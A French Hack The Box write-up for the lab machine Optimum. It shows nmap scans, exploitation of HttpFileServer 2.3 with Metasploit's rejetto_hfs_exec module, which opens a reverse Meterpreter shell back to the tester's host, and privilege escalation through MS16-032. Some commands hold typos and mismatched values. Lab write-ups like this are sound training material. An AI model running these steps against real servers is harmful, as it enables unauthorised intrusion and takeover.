Optimum
Résumé rapide
Optimum est une machine Facile de Hack The Box. Elle présente un serveur HTTP qui tourne sur une version obsolète qui permet à un attaquant de se connecter à la machine en tant qu’utilisateur. Enfin, le serveur n’ayant pas les dernières mises à jour de sécurité, un attaquant peut utiliser une vulnérabilité dans le service d’ouverture de session secondaire de Windows pour élever ses privilèges en tant qu’administrateur.
🟦 Informations générales
- Nom de la machine : Optimum
- OS : Windows
- Difficulty : Easy
- Auteur : ch4p
- Date : 16/11/2025
- Statut : En cours
🟦 1. Reconnaissance réseau
1.2 Nmap – Scan initial
nmap -p- 10.129.236.31 --min-rate 5000Services découverts :
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-16 16:15 CET
Nmap scan report for 10.129.236.31
Host is up (0.060s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 26.83 seconds1.3 Nmap – Scan complet
nmap -sVC -p80 10.169.236.31 -oN optimum.nmapInfos supplémentaires :
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-16 16:16 CET
Nmap scan report for 10.169.236.31
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
80/tcp filtered http
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.60 secondsIl semble qu’un pare-feu nous empêche de récupérer plus d’informations.
🟦 2. Analyse des services
🌐 HTTP / Web (si présent)

Nous sommes face à un serveur HttpFileServer/2.3
Une recherche rapide avec searchsploit nous informe qu’il existe une RCE sur cette version :

Technos détectées :
- HttpFileServer/2.3
🟦 3. Points d’entrée potentiels
- Exploitation du service HttpFileServer/2.3 vulnérable
🟦 4. Exploitation
4.1 PoC
On va utiliser msfconsole (Metasploit) afin d’exploiter la cible.
msf > seach HttpFileServer
msf > use exploit/windows/http/rejetto_hfs_execConfiguration de l’exploit : (options pour voir les options)
msf exploit(windows/http/rejetto_hfs_exec) > set LHOST tun0 LHOST => 10.10.14.66
msf exploit(windows/http/rejetto_hfs_exec) > set LHOST tun0 SRVPORT => 11337
msf exploit(windows/http/rejetto_hfs_exec) > set RHOST blue.htb RHOST => optimum.htbNote: Il m’a fallu changer le
SRVPORTcar le port 8080 est utilisé par Burp
Résultat :
msf exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.66:4444
[*] Using URL: http://10.10.14.66:1337/SBmExNwO5
[*] Server started.
---
<snip>
---
[*] Meterpreter session 1 opened (10.10.14.66:4444 -> 10.129.236.31:49162) at 2025-11-16 16:31:10 +0100
[*] Server stopped.
Accès obtenu :
- User : kostas
- Contexte : meterpreter/shell
🟦 5. Post-exploitation / Énumération locale
Windows
Depuis la console meterpreter, on peut utiliser la commande upload afin d’uploader winPeas
upload ~/Pentest/Tools/PEASS-ng/winPEAS/winPEASexe/winPEASx86.exeOn peut également utiliser un module de post exploitation de Metasploit, étant donné qu’on a une session meterpreter.
On commence par mettre en background notre session avec la commande bg. Puis on peut utiliser le module de reconnaissance :
msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > runsession 1 correspond à l’ID de notre session meterpreter.
Résultat : Plusieurs exploits sont disponibles

🟦 6. Élévation de privilèges
Méthode retenue :
Nous allons utiliser l’exploit d’élévation de privilèges MS16-032 (CVE-2016-0099) :
msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privescComme précédemment, nous prenons soin de set les options LHOST et session :
> set LHOST tun0
LHOST => 10.10.14.66
> set session 1
session => 1- Pourquoi ça marche : Le serveur tourne sur une version non mise à jour.
Contexte final : administrator
🟦 7. Résumé final
Ce que j’ai appris
- Utiliser Metasploit pour assister l’élévation de privilège
- Énumérations sous Windows
Patterns utiles
- Recherche de vulnérabilités en post avec Metasploit quand on a une console meterpreter
- Module
post/multi/recon/local_exploit_suggester